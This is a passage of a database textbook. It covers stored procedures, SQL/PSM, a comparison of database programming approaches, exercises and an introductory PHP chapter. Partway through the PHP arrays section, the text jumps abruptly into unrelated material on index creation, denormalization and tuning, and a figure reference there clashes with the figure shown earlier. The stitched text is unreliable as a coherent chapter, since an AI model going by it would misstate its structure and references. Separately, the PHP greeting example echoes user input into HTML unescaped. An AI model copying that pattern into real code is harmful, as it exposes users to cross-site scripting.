This concludes our brief introduction to JDBC. The interested reader is referred to
the Web site http://java.sun.com/docs/books/tutorial/jdbc/, which contains many
further details about JDBC.

4 Database Stored Procedures
and SQL/PSM

This section introduces two additional topics related to database programming. In
Section 4.1, we discuss the concept of stored procedures, which are program mod-
ules that are stored by the DBMS at the database server. Then in Section 4.2 we dis-
cuss the extensions to SQL that are specified in the standard to include
general-purpose programming constructs in SQL. These extensions are known as
SQL/PSM (SQL/Persistent Stored Modules) and can be used to write stored proce-
dures. SQL/PSM also serves as an example of a database programming language
that extends a database model and language—namely, SQL—with some program-
ming constructs, such as conditional statements and loops.

4.1 Database Stored Procedures and Functions
In our presentation of database programming techniques so far, there was an
implicit assumption that the database application program was running on a client
machine, or more likely at the application server computer in the middle-tier of a
three-tier client-server architecture. In either case, the machine where the program
is executing is different from the machine on which the database server—and the
main part of the DBMS software package—is located. Although this is suitable for
many applications, it is sometimes useful to create database program modules—
procedures or functions—that are stored and executed by the DBMS at the database
server. These are historically known as database stored procedures, although they
can be functions or procedures. The term used in the SQL standard for stored pro-
cedures is persistent stored modules because these programs are stored persistently
by the DBMS, similarly to the persistent data stored by the DBMS.

Stored procedures are useful in the following circumstances:

■ If a database program is needed by several applications, it can be stored at
the server and invoked by any of the application programs. This reduces
duplication of effort and improves software modularity.

■ Executing a program at the server can reduce data transfer and communica-
tion cost between the client and server in certain situations.

■ These procedures can enhance the modeling power provided by views by
allowing more complex types of derived data to be made available to the
database users. Additionally, they can be used to check for complex con-
straints that are beyond the specification power of assertions and triggers.

In general, many commercial DBMSs allow stored procedures and functions to be
written in a general-purpose programming language. Alternatively, a stored proce-
dure can be made of simple SQL commands such as retrievals and updates. The
general form of declaring stored procedures is as follows:

CREATE PROCEDURE <procedure name> (<parameters>)
<local declarations>
<procedure body> ;

The parameters and local declarations are optional, and are specified only if needed.
For declaring a function, a return type is necessary, so the declaration form is

CREATE FUNCTION <function name> (<parameters>)
RETURNS <return type>
<local declarations>
<function body> ;

If the procedure (or function) is written in a general-purpose programming lan-
guage, it is typical to specify the language as well as a file name where the program
code is stored. For example, the following format can be used:

CREATE PROCEDURE <procedure name> (<parameters>)
LANGUAGE <programming language name>
EXTERNAL NAME <file path name> ;

In general, each parameter should have a parameter type that is one of the SQL data
types. Each parameter should also have a parameter mode, which is one of IN, OUT,
or INOUT. These correspond to parameters whose values are input only, output
(returned) only, or both input and output, respectively.


Because the procedures and functions are stored persistently by the DBMS, it
should be possible to call them from the various SQL interfaces and programming
techniques. The CALL statement in the SQL standard can be used to invoke a stored
procedure—either from an interactive interface or from embedded SQL or SQLJ.
The format of the statement is as follows:

CALL <procedure or function name> (<argument list>) ;

If this statement is called from JDBC, it should be assigned to a statement object of
type CallableStatement (see Section 3.2).
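For instance, a hypothetical stored procedure with one IN parameter and one OUT parameter could be invoked from JDBC roughly as follows; the procedure name COMPUTE_DEPT_AVG_SAL, its parameters, and the Connection object conn are assumptions used only to illustrate the CallableStatement interface.

// Sketch only: COMPUTE_DEPT_AVG_SAL is a hypothetical procedure that takes a
// department number (IN) and returns the department's average salary (OUT).
CallableStatement cs = conn.prepareCall("{call COMPUTE_DEPT_AVG_SAL(?, ?)}") ;
cs.setInt(1, 5) ;                                     // IN parameter
cs.registerOutParameter(2, java.sql.Types.DOUBLE) ;   // OUT parameter
cs.execute() ;
double avgSal = cs.getDouble(2) ;                     // value of the OUT parameter
cs.close() ;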

4.2 SQL/PSM: Extending SQL for Specifying Persistent Stored
Modules

SQL/PSM is the part of the SQL standard that specifies how to write persistent
stored modules. It includes the statements to create functions and procedures that
we described in the previous section. It also includes additional programming con-
structs to enhance the power of SQL for the purpose of writing the code (or body)
of stored procedures and functions.

In this section, we discuss the SQL/PSM constructs for conditional (branching)
statements and for looping statements. These will give a flavor of the type of con-
structs that SQL/PSM has incorporated;20 then we give an example to illustrate how
these constructs can be used.

The conditional branching statement in SQL/PSM has the following form:

IF <condition> THEN <statement list>
ELSEIF <condition> THEN <statement list>
...
ELSEIF <condition> THEN <statement list>
ELSE <statement list>
END IF ;

Consider the example in Figure 14, which illustrates how the conditional branch
structure can be used in an SQL/PSM function. The function returns a string value
(line 1) describing the size of a department within a company based on the number
of employees. There is one IN integer parameter, deptno, which gives a department
number. A local variable NoOfEmps is declared in line 2. The query in lines 3 and 4
returns the number of employees in the department, and the conditional branch in
lines 5 to 8 then returns one of the values {‘HUGE’, ‘LARGE’, ‘MEDIUM’, ‘SMALL’}
based on the number of employees.

SQL/PSM has several constructs for looping. There are standard while and repeat
looping structures, which have the following forms:

20We only give a brief introduction to SQL/PSM here. There are many other features in the SQL/PSM
standard.


Figure 14
Declaring a function in
SQL/PSM.

//Function PSM1:
0) CREATE FUNCTION Dept_size(IN deptno INTEGER)
1) RETURNS VARCHAR [7]
2) DECLARE No_of_emps INTEGER ;
3) SELECT COUNT(*) INTO No_of_emps
4) FROM EMPLOYEE WHERE Dno = deptno ;
5) IF No_of_emps > 100 THEN RETURN 'HUGE'
6) ELSEIF No_of_emps > 25 THEN RETURN 'LARGE'
7) ELSEIF No_of_emps > 10 THEN RETURN 'MEDIUM'
8) ELSE RETURN 'SMALL'
9) END IF ;

WHILE <condition> DO
<statement list>
END WHILE ;

REPEAT
<statement list>
UNTIL <condition>
END REPEAT ;

There is also a cursor-based looping structure. The statement list in such a loop is
executed once for each tuple in the query result. This has the following form:

FOR <loop name> AS <cursor name> CURSOR FOR <query> DO
<statement list>
END FOR ;

Loops can have names, and there is a LEAVE <loop name> statement to break a loop
when a condition is satisfied. SQL/PSM has many other features, but they are out-
side the scope of our presentation.

5 Comparing the Three Approaches
In this section, we briefly compare the three approaches for database programming
and discuss the advantages and disadvantages of each approach.

1. Embedded SQL Approach. The main advantage of this approach is that the
query text is part of the program source code itself, and hence can be
checked for syntax errors and validated against the database schema at com-
pile time. This also makes the program quite readable, as the queries are
readily visible in the source code. The main disadvantages are the loss of flex-
ibility in changing the query at runtime, and the fact that all changes to
queries must go through the whole recompilation process. On the other hand,
because the queries are known beforehand, the choice of program variables
to hold the query results is a simple task, and so the programming of the
application is generally easier. However, for complex applications where
queries have to be generated at runtime, the function call approach will be
more suitable.

2. Library of Function Calls Approach. This approach provides more flexibil-
ity in that queries can be generated at runtime if needed. However, this leads
to more complex programming, as program variables that match the
columns in the query result may not be known in advance. Because queries
are passed as statement strings within the function calls, no checking can be
done at compile time. All syntax checking and query validation has to be
done at runtime, and the programmer must check and account for possible
additional runtime errors within the program code.

3. Database Programming Language Approach. This approach does not suf-
fer from the impedance mismatch problem, as the programming language
data types are the same as the database data types. However, programmers
must learn a new programming language rather than use a language they are
already familiar with. In addition, some database programming languages
are vendor-specific, whereas general-purpose programming languages can
easily work with systems from multiple vendors.

6 Summary
In this chapter we presented additional features of the SQL database language. In
particular, we presented an overview of the most important techniques for database
programming in Section 1. Then we discussed the various approaches to database
application programming in Sections 2 to 4.

In Section 2, we discussed the general technique known as embedded SQL, where
the queries are part of the program source code. A precompiler is typically used to
extract SQL commands from the program for processing by the DBMS and to replace
them with function calls to the DBMS-compiled code. We presented an overview
of embedded SQL, using the C programming language as host language in our
examples. We also discussed the SQLJ technique for embedding SQL in Java pro-
grams. The concepts of cursor (for embedded SQL) and iterator (for SQLJ) were
presented and illustrated by examples to show how they are used for looping over
the tuples in a query result, and extracting the attribute value into program vari-
ables for further processing.

In Section 3, we discussed how function call libraries can be used to access SQL
databases. This technique is more dynamic than embedding SQL, but requires more
complex programming because the attribute types and number in a query result
may be determined at runtime. An overview of the SQL/CLI standard was pre-
sented, with examples using C as the host language. We discussed some of the func-
tions in the SQL/CLI library, how queries are passed as strings, how query
parameters are assigned at runtime, and how results are returned to program vari-
ables. We then gave an overview of the JDBC class library, which is used with Java,
and discussed some of its classes and operations. In particular, the ResultSet class
is used to create objects that hold the query results, which can then be iterated over
by the next() operation. The get and set functions for retrieving attribute values
and setting parameter values were also discussed.

In Section 4 we gave a brief overview of stored procedures, and discussed SQL/PSM
as an example of a database programming language. Finally, we briefly compared
the three approaches in Section 5. It is important to note that we chose to give a
comparative overview of the three main approaches to database programming,
since studying a particular approach in depth is a topic that is worthy of its own
textbook.

Review Questions
1. What is ODBC? How is it related to SQL/CLI?

2. What is JDBC? Is it an example of embedded SQL or of using function calls?

3. List the three main approaches to database programming. What are the
advantages and disadvantages of each approach?

4. What is the impedance mismatch problem? Which of the three program-
ming approaches minimizes this problem?

5. Describe the concept of a cursor and how it is used in embedded SQL.

6. What is SQLJ used for? Describe the two types of iterators available in SQLJ.

Exercises
7. Consider the database shown in Figure A.2, whose schema is shown in

Figure A.3. Write a program segment to read a student’s name and print his
or her grade point average, assuming that A=4, B=3, C=2, and D=1 points.
Use embedded SQL with C as the host language.

8. Repeat Exercise 7, but use SQLJ with Java as the host language.

9. Consider the library relational database schema in Figure A.4. Write a pro-
gram segment that retrieves the list of books that became overdue yesterday
and that prints the book title and borrower name for each. Use embedded
SQL with C as the host language.

10. Repeat Exercise 9, but use SQLJ with Java as the host language.

11. Repeat Exercises 7 and 9, but use SQL/CLI with C as the host language.

12. Repeat Exercises 7 and 9, but use JDBC with Java as the host language.

13. Repeat Exercise 7, but write a function in SQL/PSM.

14. Create a function in PSM that computes the median salary for the
EMPLOYEE table shown in Figure A.1.


Selected Bibliography
There are many books that describe various aspects of SQL database programming.
For example, Sunderraman (2007) describes programming on the Oracle 10g
DBMS and Reese (1997) focuses on JDBC and Java programming. Many Web
resources are also available.

Figure A.1
Schema diagram for the COMPANY relational database schema.

EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)
DEPARTMENT (Dname, Dnumber, Mgr_ssn, Mgr_start_date)
DEPT_LOCATIONS (Dnumber, Dlocation)
PROJECT (Pname, Pnumber, Plocation, Dnum)
WORKS_ON (Essn, Pno, Hours)
DEPENDENT (Essn, Dependent_name, Sex, Bdate, Relationship)


Figure A.2
A database that stores student and course information.

STUDENT
Name    Student_number   Class   Major
Smith   17               1       CS
Brown   8                2       CS

COURSE
Course_name                 Course_number   Credit_hours   Department
Intro to Computer Science   CS1310          4              CS
Data Structures             CS3320          4              CS
Discrete Mathematics        MATH2410        3              MATH
Database                    CS3380          3              CS

SECTION
Section_identifier   Course_number   Semester   Year   Instructor
85                   MATH2410        Fall       07     King
92                   CS1310          Fall       07     Anderson
102                  CS3320          Spring     08     Knuth
112                  MATH2410        Fall       08     Chang
119                  CS1310          Fall       08     Anderson
135                  CS3380          Fall       08     Stone

GRADE_REPORT
Student_number   Section_identifier   Grade
17               112                  B
17               119                  C
8                85                   A
8                92                   A
8                102                  B
8                135                  A

PREREQUISITE
Course_number   Prerequisite_number
CS3380          CS3320
CS3380          MATH2410
CS3320          CS1310


Figure A.3
Schema diagram for the database in Figure A.2.

STUDENT (Name, Student_number, Class, Major)
COURSE (Course_name, Course_number, Credit_hours, Department)
SECTION (Section_identifier, Course_number, Semester, Year, Instructor)
GRADE_REPORT (Student_number, Section_identifier, Grade)
PREREQUISITE (Course_number, Prerequisite_number)


Figure A.4
A relational database schema for a LIBRARY database.

BOOK (Book_id, Title, Publisher_name)
BOOK_AUTHORS (Book_id, Author_name)
PUBLISHER (Name, Address, Phone)
BOOK_COPIES (Book_id, Branch_id, No_of_copies)
BOOK_LOANS (Book_id, Branch_id, Card_no, Date_out, Due_date)
LIBRARY_BRANCH (Branch_id, Branch_name, Address)
BORROWER (Card_no, Name, Address, Phone)


Web Database
Programming Using PHP

In this chapter, we direct our attention to how databases are accessed from scripting languages. Many
electronic commerce (e-commerce) and other Internet applications that provide
Web interfaces to access information stored in one or more databases use scripting
languages. These languages are often used to generate HTML documents, which are
then displayed by the Web browser for interaction with the user.

Basic HTML is useful for generating static Web pages with fixed text and other
objects, but most e-commerce applications require Web pages that provide interac-
tive features with the user. For example, consider the case of an airline customer
who wants to check the arrival time and gate information of a particular flight. The
user may enter information such as a date and flight number in certain form fields
of the Web page. The Web program must first submit a query to the airline database
to retrieve this information, and then display it. Such Web pages, where part of the
information is extracted from databases or other data sources, are called dynamic
Web pages. The data extracted and displayed each time will be for different flights
and dates.

There are various techniques for programming dynamic features into Web pages.
We will focus on one technique here, which is based on using the PHP open source
scripting language. PHP has recently experienced widespread use. The interpreters
for PHP are provided free of charge, and are written in the C language so they are

From Chapter 14 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


available on most computer platforms. A PHP interpreter provides a Hypertext
Preprocessor, which will execute PHP commands in a text file and create the desired
HTML file. To access databases, a library of PHP functions needs to be included in
the PHP interpreter as we will discuss in Section 3. PHP programs are executed on
the Web server computer. This is in contrast to some scripting languages, such as
JavaScript, that are executed on the client computer.

This chapter is organized as follows. Section 1 gives a simple example to illustrate
how PHP can be used. Section 2 gives a general overview of the PHP language, and
how it is used to program some basic functions for interactive Web pages. Section 3
focuses on using PHP to interact with SQL databases through a library of functions
known as PEAR DB. Finally, Section 4 contains a chapter summary.

1 A Simple PHP Example
PHP is an open source general-purpose scripting language. The interpreter engine
for PHP is written in the C programming language so it can be used on nearly all
types of computers and operating systems. PHP usually comes installed with the
UNIX operating system. For computer platforms with other operating systems such
as Windows, Linux, or Mac OS, the PHP interpreter can be downloaded from:
http://www.php.net. As with other scripting languages, PHP is particularly suited
for manipulation of text pages, and in particular for manipulating dynamic HTML
pages at the Web server computer. This is in contrast to JavaScript, which is down-
loaded with the Web pages to execute on the client computer.

PHP has libraries of functions for accessing databases stored under various types of
relational database systems such as Oracle, MySQL, SQLServer, and any system that
supports the ODBC standard. Under the three-tier architecture, the DBMS would
reside at the bottom-tier database server. PHP would run at the middle-tier Web
server, where the PHP program commands would manipulate the HTML files to
create the customized dynamic Web pages. The HTML is then sent to the client tier
for display and interaction with the user.

Consider the example shown in Figure 1(a), which prompts a user to enter the first
and last name and then prints a welcome message to that user. The line numbers are
not part of the program code; they are used below for explanation purposes only:

1. Suppose that the file containing PHP script in program segment P1 is stored
in the following Internet location: http://www.myserver.com/example/
greeting.php. Then if a user types this address in the browser, the PHP inter-
preter would start interpreting the code and produce the form shown in
Figure 1(b). We will explain how that happens as we go over the lines in code
segment P1.

2. Line 0 shows the PHP start tag <?php, and the matching PHP end tag ?> is shown on line 16. Text outside of these tags is


Figure 1
(a) PHP program segment for entering a greeting,
(b) Initial form displayed by PHP program segment,
(c) User enters name John Smith, (d) Form prints
welcome message for John Smith.

(a)
//Program Segment P1:

0) <?php
1) // Print a welcome message if the user has submitted a name through the form
2) if ($_POST['user_name']) {
3) print("Welcome, ") ;
4) print($_POST['user_name']) ;
5) }
6) else {
7) // Otherwise, print the HTML form that asks for the user's name
8) print <<<_HTML_
9) <form method="post" action="$_SERVER[PHP_SELF]">
10) Enter your name: <input type="text" name="user_name">
11) <br/>
12) <input type="submit" value="SUBMIT NAME">
13) </form>
14) _HTML_;
15) }
16) ?>

printed as is. This allows PHP code segments to be included within a larger
HTML file. Only the sections in the file between <?php and ?> are processed
by the PHP preprocessor.

3. Line 1 shows one way of posting comments in a PHP program on a single
line started by //. Single-line comments can also be started with #, and end
at the end of the line in which they are entered. Multiple line comments start
with /* and end with */.

4. The auto-global predefined PHP variable $_POST (line 2) is an array that
holds all the values entered through form parameters. Arrays in PHP are
dynamic arrays, with no fixed number of elements. They can be numerically
indexed arrays whose indexes (positions) are numbered (0, 1, 2, …), or they
can be associative arrays whose indexes can be any string values. For example,
an associative array indexed based on color can have the indexes {“red”,
“blue”, “green”}. In this example, $_POST is associatively indexed by the name
of the posted value user_name that is specified in the name attribute of the
input tag on line 10. Thus $_POST[‘user_name’] will contain the value
typed in by the user. We will discuss PHP arrays further in Section 2.2.

5. When the Web page at http://www.myserver.com/example/greeting.php is
first opened, the if condition in line 2 will evaluate to false because there is
no value yet in $_POST[‘user_name’]. Hence, the PHP interpreter will
process lines 6 through 15, which create the text for an HTML file that dis-
plays the form shown in Figure 1(b). This is then displayed at the client side
by the Web browser.

6. Line 8 shows one way of creating long text strings in an HTML file. We will
discuss other ways to specify strings later in this section. All text between an
opening <<<_HTML_ and a closing _HTML_; is printed into the HTML file as is. The closing _HTML_; must be alone on a separate line. Thus, the text added to the HTML file sent to the client will be the text between lines 9 and 13. This includes HTML tags to create the form shown in Figure 1(b).

7. PHP variable names start with a $ sign and can include characters, numbers, and the underscore character _. The PHP auto-global (predefined) variable $_SERVER (line 9) is an array that includes information about the local server. The element $_SERVER['PHP_SELF'] in the array is the path name of the PHP file currently being executed on the server. Thus, the action attribute of the form tag (line 9) instructs the PHP interpreter to reprocess the same file, once the form parameters are entered by the user.

8. Once the user types the name John Smith in the text box and clicks on the SUBMIT NAME button (Figure 1(c)), program segment P1 is reprocessed. This time, $_POST['user_name'] will include the string "John Smith", so lines 3 and 4 will now be placed in the HTML file sent to the client, which displays the message in Figure 1(d).

As we can see from this example, the PHP program can create two different HTML documents depending on whether the user has just started or has already submitted a name through the form. In general, a PHP program can create numerous variations of HTML text in an HTML file at the server depending on the particular conditional paths taken in the program. Hence, the HTML sent to the client will differ depending on the interaction with the user. This is one way in which PHP is used to create dynamic Web pages.

2 Overview of Basic Features of PHP

In this section we give an overview of a few of the features of PHP that are useful in creating interactive HTML pages. Section 3 will focus on how PHP programs can access databases for querying and updating. We cannot give a comprehensive discussion on PHP, as there are whole books devoted to this subject. Rather, we focus on illustrating certain features of PHP that are particularly suited for creating dynamic Web pages that contain database access commands. This section covers some PHP concepts and features that will be needed when we discuss database access in Section 3.

2.1 PHP Variables, Data Types, and Programming Constructs

PHP variable names start with the $ symbol and can include characters, numbers, and the underscore character (_). No other special characters are permitted. Variable names are case sensitive, and the first character cannot be a number. Variables are not typed. The values assigned to the variables determine their type. In fact, the same variable can change its type once a new value is assigned to it. Assignment is via the = operator.

Since PHP is directed toward text processing, there are several different types of string values. There are also many functions available for processing strings. We only discuss some basic properties of string values and variables here. Figure 2 illustrates some string values. There are three main ways to express strings and text:

1. Single-quoted strings. Enclose the string between single quotes, as in lines 0, 1, and 2. If a single quote is needed within the string, use the escape character (\) (see line 2).

2. Double-quoted strings. Enclose strings between double quotes as in line 7. In this case, variable names appearing within the string are replaced by the values that are currently stored in these variables.
The interpreter identifies variable names within double-quoted strings by their initial character $ and replaces them with the value in the variable. This is known as interpolating variables within strings. Interpolation does not occur in single-quoted strings.

Figure 2
Illustrating basic PHP string and text values.

0)  print 'Welcome to my Web site.';
1)  print 'I said to him, "Welcome Home"';
2)  print 'We\'ll now visit the next Web site';
3)  printf('The cost is $%.2f and the tax is $%.2f', $cost, $tax);
4)  print strtolower('AbCdE');
5)  print ucwords(strtolower('JOHN smith'));
6)  print 'abc' . 'efg';
7)  print "send your email reply to: $email_address";
8)  print <<<FORM_HTML
9)  <FORM method="post" action="$_SERVER[PHP_SELF]">
10) Enter your name: <INPUT type="text" name="user_name">
11) FORM_HTML;

3. Here documents. Enclose the text to be printed between an opening <<<DOCNAME and a closing line that contains only the delimiter name DOCNAME; any identifier can serve as the delimiter, as illustrated by FORM_HTML in lines 8 through 11 of Figure 2 and by _HTML_ in Figure 1(a). PHP also provides the usual comparison operators, such as > (greater than), >= (greater than or equal), < (less than), and <= (less than or equal).

2.2 PHP Arrays

Arrays are very important in PHP, since they allow lists of elements. They are used frequently in forms that employ pull-down menus. A single-dimensional array is used to hold the list of choices in the pull-down menu. For database query results, two-dimensional arrays are used, with the first dimension representing the rows of a table and the second dimension representing the columns (attributes) within a row.

Figure 3
Illustrating basic PHP array processing.

0) $teaching = array('Database' => 'Smith', 'OS' => 'Carrick', 'Graphics' => 'Kam');

1) $teaching['Graphics'] = 'Benson'; $teaching['Data Mining'] = 'Kam';
2) sort($teaching);
3) foreach ($teaching as $key => $value) {
4)    print " $key : $value\n"; }
5) $courses = array('Database', 'OS', 'Graphics', 'Data Mining');
6) $alt_row_color = array('blue', 'yellow');
7) for ($i = 0, $num = count($courses); $i < $num; $i++) {
8)    print '<TR bgcolor="' . $alt_row_color[$i % 2] . '">';
9)    print "<TD>Course $i is</TD><TD>$courses[$i]</TD></TR>"; }

An index can be created on an attribute of a table using the general form of the SQL command:

CREATE [ UNIQUE ] INDEX <index name>
ON <table name> ( <column name> [ <order> ] { , <column name> [ <order> ] } )
[ CLUSTER ] ;

The keywords UNIQUE and CLUSTER are optional. The keyword CLUSTER is used
when the index to be created should also sort the data file records on the indexing
attribute. Thus, specifying CLUSTER on a key (unique) attribute would create some
variation of a primary index, whereas specifying CLUSTER on a nonkey
(nonunique) attribute would create some variation of a clustering index. The value
for <order> can be either ASC (ascending) or DESC (descending), and specifies
whether the data file should be ordered in ascending or descending values of the
indexing attribute. The default is ASC. For example, the following would create a
clustering (ascending) index on the nonkey attribute Dno of the EMPLOYEE file:

CREATE INDEX DnoIndex
ON EMPLOYEE (Dno)
CLUSTER ;
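For contrast, a unique (key-based) index in the same generic syntax, here sketched on the key attribute Ssn of EMPLOYEE, could be declared as follows; whether such an index also clusters the file depends on the particular DBMS:

-- A unique index on the key attribute Ssn (no CLUSTER clause)
CREATE UNIQUE INDEX SsnIndex
ON EMPLOYEE (Ssn) ;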

Denormalization as a Design Decision for Speeding Up Queries. The ulti-
mate goal during normalization is to separate attributes into tables to minimize
redundancy, and thereby avoid the update anomalies that lead to an extra process-
ing overhead to maintain consistency in the database. The ideals that are typically
followed are the third or Boyce-Codd normal forms.

The above ideals are sometimes sacrificed in favor of faster execution of frequently
occurring queries and transactions. This process of storing the logical database
design (which may be in BCNF or 4NF) in a weaker normal form, say 2NF or 1NF,
is called denormalization. Typically, the designer includes certain attributes from a
table S into another table R. The reason is that the attributes from S that are
included in R are frequently needed—along with other attributes in R—for answer-
ing queries or producing reports. By including these attributes, a join of R with S is
avoided for these frequently occurring queries and reports. This reintroduces
redundancy in the base tables by including the same attributes in both tables R and
S. A partial functional dependency or a transitive dependency now exists in the table
R, thereby creating the associated redundancy problems. A tradeoff exists between
the additional updating needed for maintaining consistency of redundant attributes
versus the effort needed to perform a join to incorporate the additional attributes
needed in the result. For example, consider the following relation:

ASSIGN (Emp_id, Proj_id, Emp_name, Emp_job_title, Percent_assigned, Proj_name,
Proj_mgr_id, Proj_mgr_name),

which corresponds exactly to the headers in a report called The Employee
Assignment Roster.

This relation is only in 1NF because of the following functional dependencies:

Proj_id → Proj_name, Proj_mgr_id
Proj_mgr_id → Proj_mgr_name
Emp_id → Emp_name, Emp_job_title

This relation may be preferred over the design in 2NF (and 3NF) consisting of the
following three relations:

EMP (Emp_id, Emp_name, Emp_job_title)
PROJ (Proj_id, Proj_name, Proj_mgr_id)
EMP_PROJ (Emp_id, Proj_id, Percent_assigned)

This is because to produce The Employee Assignment Roster report (with all
fields shown in ASSIGN above), the latter multirelation design requires two
NATURAL JOIN (indicated with *) operations (between EMP and EMP_PROJ, and
between PROJ and EMP_PROJ), plus a final JOIN between PROJ and EMP to retrieve
the Proj_mgr_name from the Proj_mgr_id. Thus the following JOINs would be needed
(the final join would also require renaming (aliasing) of the last EMP table, which is
not shown):

((EMP_PROJ * EMP) * PROJ) ⋈(PROJ.Proj_mgr_id = EMP.Emp_id) EMP
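For comparison, the same roster could be produced from the normalized design with an SQL query along the following lines (a sketch only; the alias M for the manager copy of EMP and the output column heading Proj_mgr_name are chosen here for illustration):

SELECT E.Emp_id, P.Proj_id, E.Emp_name, E.Emp_job_title,
       EP.Percent_assigned, P.Proj_name, P.Proj_mgr_id,
       M.Emp_name AS Proj_mgr_name
FROM   EMP_PROJ EP, EMP E, PROJ P, EMP M
WHERE  EP.Emp_id = E.Emp_id
  AND  EP.Proj_id = P.Proj_id
  AND  P.Proj_mgr_id = M.Emp_id;

The fourth table in the FROM clause is the renamed (aliased) copy of EMP mentioned above, used to map Proj_mgr_id to the manager's name.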

It is also possible to create a view for the ASSIGN table. This does not mean that
the join operations will be avoided, but that the user need not specify the joins. If
the view table is materialized, the joins would be avoided, but if the virtual view
table is not stored as a materialized file, the join computations would still be nec-
essary. Other forms of denormalization consist of storing extra tables to maintain
original functional dependencies that are lost during BCNF decomposition. For
example, Figure A.1 (in Appendix: Figure at the end of this chapter) shows the
TEACH(Student, Course, Instructor) relation with the functional dependencies
{{Student, Course} → Instructor, Instructor → Course}. A lossless decomposition of
TEACH into T1(Student, Instructor) and T2(Instructor, Course) does not allow queries
of the form what course did student Smith take from instructor Navathe to be
answered without joining T1 and T2. Therefore, storing T1, T2, and TEACH may be
a possible solution, which reduces the design from BCNF to 3NF. Here, TEACH is a
materialized join of the other two tables, representing an extreme redundancy. Any
updates to T1 and T2 would have to be applied to TEACH. An alternate strategy is
to create T1 and T2 as updatable base tables, and to create TEACH as a view (virtual
table) on T1 and T2 that can only be queried.
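A rough SQL sketch of this last alternative, assuming the decomposed tables T1(Student, Instructor) and T2(Instructor, Course) from above (the column types are placeholders chosen only for illustration):

CREATE TABLE T1 ( Student    VARCHAR(30),
                  Instructor VARCHAR(30),
                  PRIMARY KEY (Student, Instructor) );

CREATE TABLE T2 ( Instructor VARCHAR(30) PRIMARY KEY,
                  Course     VARCHAR(30) );

-- TEACH is not stored; it is a virtual table reconstructed by joining T1 and T2
CREATE VIEW TEACH (Student, Course, Instructor) AS
SELECT T1.Student, T2.Course, T1.Instructor
FROM   T1, T2
WHERE  T1.Instructor = T2.Instructor;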

2 An Overview of Database Tuning
in Relational Systems

After a database is deployed and is in operation, actual use of the applications, trans-
actions, queries, and views reveals factors and problem areas that may not have been
accounted for during the initial physical design. The inputs to physical design listed
in Section 1.1 can be revised by gathering actual statistics about usage patterns.
Resource utilization as well as internal DBMS processing—such as query optimiza-
tion—can be monitored to reveal bottlenecks, such as contention for the same data
or devices. Volumes of activity and sizes of data can be better estimated. Therefore, it
is necessary to monitor and revise the physical database design constantly—an activ-
ity referred to as database tuning. The goals of tuning are as follows:

■ To make applications run faster.

■ To improve (lower) the response time of queries and transactions.

■ To improve the overall throughput of transactions.

The dividing line between physical design and tuning is very thin. The same design
decisions that we discussed in Section 1.2 are revisited during database tuning,
which is a continual adjustment of the physical design. We give a brief overview of
the tuning process below.3 The inputs to the tuning process include statistics related
to the same factors mentioned in Section 1.1. In particular, DBMSs can internally
collect the following statistics:

■ Sizes of individual tables.

■ Number of distinct values in a column.

■ The number of times a particular query or transaction is submitted and exe-
cuted in an interval of time.

■ The times required for different phases of query and transaction processing
(for a given set of queries or transactions).

These and other statistics create a profile of the contents and use of the database.
Other information obtained from monitoring the database system activities and
processes includes the following:

■ Storage statistics. Data about allocation of storage into tablespaces, index-
spaces, and buffer pools.

■ I/O and device performance statistics. Total read/write activity (paging) on
disk extents and disk hot spots.

■ Query/transaction processing statistics. Execution times of queries and
transactions, and optimization times during query optimization.

3Interested readers should consult Shasha and Bonnet (2002) for a detailed discussion of tuning.

■ Locking/logging related statistics. Rates of issuing different types of locks,
transaction throughput rates, and log records activity.

■ Index statistics. Number of levels in an index, number of noncontiguous
leaf pages, and so on.

Some of the above statistics relate to transactions, concurrency control, and recov-
ery. Tuning a database involves dealing with the following types of problems:

■ How to avoid excessive lock contention, thereby increasing concurrency
among transactions.

■ How to minimize the overhead of logging and unnecessary dumping of data.

■ How to optimize the buffer size and scheduling of processes.

■ How to allocate resources such as disks, RAM, and processes for most effi-
cient utilization.

Most of the previously mentioned problems can be solved by the DBA by setting
appropriate physical DBMS parameters, changing configurations of devices, chang-
ing operating system parameters, and other similar activities. The solutions tend to
be closely tied to specific systems. The DBAs are typically trained to handle these
tuning problems for the specific DBMS. We briefly discuss the tuning of various
physical database design decisions below.

2.1 Tuning Indexes
The initial choice of indexes may have to be revised for the following reasons:

■ Certain queries may take too long to run for lack of an index.

■ Certain indexes may not get utilized at all.

■ Certain indexes may undergo too much updating because the index is on an
attribute that undergoes frequent changes.

Most DBMSs have a command or trace facility, which can be used by the DBA to ask
the system to show how a query was executed—what operations were performed in
what order and what secondary access structures (indexes) were used. By analyzing
these execution plans, it is possible to diagnose the causes of the above problems.
Some indexes may be dropped and some new indexes may be created based on the
tuning analysis.
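As a hedged illustration of this cycle (the plan-display command and the exact DROP INDEX syntax vary from system to system; EXPLAIN and the index name DnoIndex are used here only as stand-ins, reusing the EMPLOYEE example given earlier):

-- Ask the DBMS how it executes a frequent query (command name varies by system)
EXPLAIN SELECT Fname, Lname FROM EMPLOYEE WHERE Dno = 5;

-- If the plan shows a full table scan on EMPLOYEE, an index on Dno may help
CREATE INDEX DnoIndex ON EMPLOYEE (Dno);

-- Conversely, an index that the plans never use but that slows down updates can be dropped
DROP INDEX DnoIndex;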

The goal of tuning is to dynamically evaluate the requirements, which sometimes
fluctuate seasonally or during different times of the month or week, and to reorgan-
ize the indexes and file organizations to yield the best overall performance.
Dropping and building new indexes is an overhead that can be justified in terms of
performance improvements. Updating of a table is generally suspended while an
index is dropped or created; this loss of service must be accounted for. Besides drop-
ping or creating indexes and changing from a nonclustered to a clustered index and
vice versa, rebuilding the index may improve performance. Most RDBMSs use
B+-trees for an index. If there are many deletions on the index key, index pages may
contain wasted space, which can be reclaimed during a rebuild operation. Similarly,
too many insertions may cause overflows in a clustered index that affect perfor-
mance. Rebuilding a clustered index amounts to reorganizing the entire table
ordered on that key.

The available options for indexing and the way they are defined, created, and reor-
ganized vary from system to system. As an illustration, consider the sparse and
dense indexes. A sparse index such as a primary index will have one index pointer for
each page (disk block) in the data file; a dense index such as a unique secondary
index will have an index pointer for each record. Sybase provides clustering indexes
as sparse indexes in the form of B+-trees, whereas INGRES provides sparse clustering
indexes as ISAM files and dense clustering indexes as B+-trees. In some versions of
Oracle and DB2, the option of setting up a clustering index is limited to a dense
index (with many more index entries), and the DBA has to work with this limitation.

2.2 Tuning the Database Design
